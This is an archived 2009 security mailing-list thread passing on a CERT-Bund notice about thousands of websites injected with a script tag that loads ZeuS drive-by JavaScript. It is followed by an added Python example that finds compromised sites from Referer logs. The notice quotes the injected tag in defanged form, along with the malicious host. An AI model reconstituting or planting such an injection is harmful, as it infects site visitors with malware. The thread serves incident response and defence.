[nsp-sec] ACK 3303, 29222 compromised websites (ZeuS drive-by downloads)

Jan Boogman boogman at ip-plus.net
Tue Apr 28 02:52:02 EDT 2009


ACK 3303, 29222

Jan

On 27.04.2009 at 18:02, Dirk Stander wrote:

> ----------- nsp-security Confidential --------
>
> .: Hi,
>
> I'm sending this by courtesy of Thomas Hungenberg (CERT_BUND / BSI).
>
>    Regards Dirk Stander (1&1) :.
>
> =====================================================================
>
> Hi teams,
>
> there was a malicious javascript at <hXXp://crew.abnc-portal.com/show.js>.
> A reference to this URL has been injected into thousands of compromised websites
> like this (remove XXX) - usually before the closing BODY tag:
>
> <!-- ad --><scrXXXipt language=javascript src="hXXp://crew.abnc-portal.com/show.js"></scrXXXipt><!-- /ad -->
>
> For an unknown reason, the IP address for crew.abnc-portal.com was changed
> to 88.80.216.114 by the attackers(?) some days ago.
>
> 88.80.216.114 is hosting the Swiss security blog 'abuse.ch'.
> This server is not malicious and has not been compromised!
>
> By analyzing the Referer headers from the requests for /show.js that hit 88.80.216.114,
> we were able to identify compromised websites that have the above mentioned javascript
> injected into one or more pages.
>
> Please find attached a list of ~10.000 compromised websites that showed up in the Referers.
>
> =====================================================================
> <showjs_referer_asn.txt>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
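
The Referer analysis described in the quoted notice, as an added example that is not part of the original e-mails: it assumes the server receiving the /show.js requests writes Combined Log Format access logs. The function name `referring_sites`, the sample log lines and the example.* hostnames are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Combined Log Format:
#   ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def referring_sites(lines, path="/show.js"):
    """Count referring hostnames for requests whose URL path equals `path`.

    The Referer header is client-supplied, so each hostname is a lead to
    verify (fetch the page, look for the injected tag), not proof by itself.
    """
    sites = Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line or a different log format
        try:
            # Compare the path only, so "/show.js?x=1" still counts.
            if urlsplit(m["target"]).path != path:
                continue
            ref = urlsplit(m["referer"])
            host = ref.hostname
        except ValueError:
            continue  # unparsable URL in the request or the Referer
        if ref.scheme not in ("http", "https") or not host:
            continue  # "-" or empty Referer: nothing to attribute
        sites[host.rstrip(".")] += 1  # hostname is already lower-cased
    return sites

# Constructed sample lines (documentation IP ranges, example.* hosts).
SAMPLE = [
    '192.0.2.10 - - [27/Apr/2009:10:00:01 +0200] "GET /show.js HTTP/1.1" 404 209 "http://shop.example.org/index.html" "Mozilla/4.0"',
    '192.0.2.11 - - [27/Apr/2009:10:00:05 +0200] "GET /show.js HTTP/1.1" 404 209 "http://SHOP.example.org/cart.php?id=3" "Mozilla/4.0"',
    '198.51.100.7 - - [27/Apr/2009:10:01:12 +0200] "GET /show.js?r=1 HTTP/1.0" 404 209 "http://blog.example.net/" "Mozilla/5.0"',
    '198.51.100.8 - - [27/Apr/2009:10:02:40 +0200] "GET /show.js HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Apr/2009:10:03:02 +0200] "GET /index.html HTTP/1.1" 200 5120 "http://other.example.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, hits in referring_sites(SAMPLE).most_common():
        print(f"{hits:6d}  {host}")
```
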



